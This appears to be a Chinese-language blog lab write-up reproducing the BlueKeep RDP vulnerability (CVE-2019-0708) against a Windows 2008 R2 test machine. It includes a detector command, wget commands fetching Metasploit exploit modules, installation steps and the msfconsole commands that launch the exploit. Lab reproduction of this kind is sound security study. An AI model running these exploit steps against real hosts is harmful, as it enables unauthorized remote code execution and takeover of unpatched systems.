CVE-2019-0708复现实验

0x1,前言

CVE-2019-0708在5月份爆出来,今年9月份有表哥在Github上开源过攻击exp,虽然不能直接得到shell,而且现在只对于windows7和windows 2008R2有用且稳定性不太高,但是极大的方便了攻击者。

0x2,漏洞简述

这个漏洞的影响windows版本众多,在用户开启了3389端口,且可以任意IP连入,则就有漏洞风险,攻击者在没有任何授权的情况下,可以远程直接攻击操作系统开放的3389服务,在受害主机上执行恶意攻击行为,包括安装后门,查看、篡改隐私数据,创建拥有完全用户权限的新账户。

0x3,复现实验

环境:

攻击机:kali IP:192.168.11.134
靶机: win2008R2 IP:192.168.11.136
工具:360_RDP漏洞扫描工具和 MSF框架

步骤:

1,360有个专门的检测工具(记得关闭自己的杀毒软件):

0708detector.exe -t 192.168.11.136(要测试的目标IP) -p 3389(目标端口,一般都是3389)

CVE-2019-0708复现实验_第1张图片

这里显示有漏洞风险。

2,现在exp脚本并配置msf

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

将文件导入对应的文件中

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

启动msf进行更新

apt-get update

apt-get install metasploit-framework

最后:realod_all

3,exp打进去:

target各个参数

CVE-2019-0708复现实验_第2张图片

use exploit/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.101
set target 3
run

CVE-2019-0708复现实验_第3张图片

这里没开注册表,所以蓝屏了,细节不做讨论。

你可能感兴趣的:(CVE-2019-0708复现实验)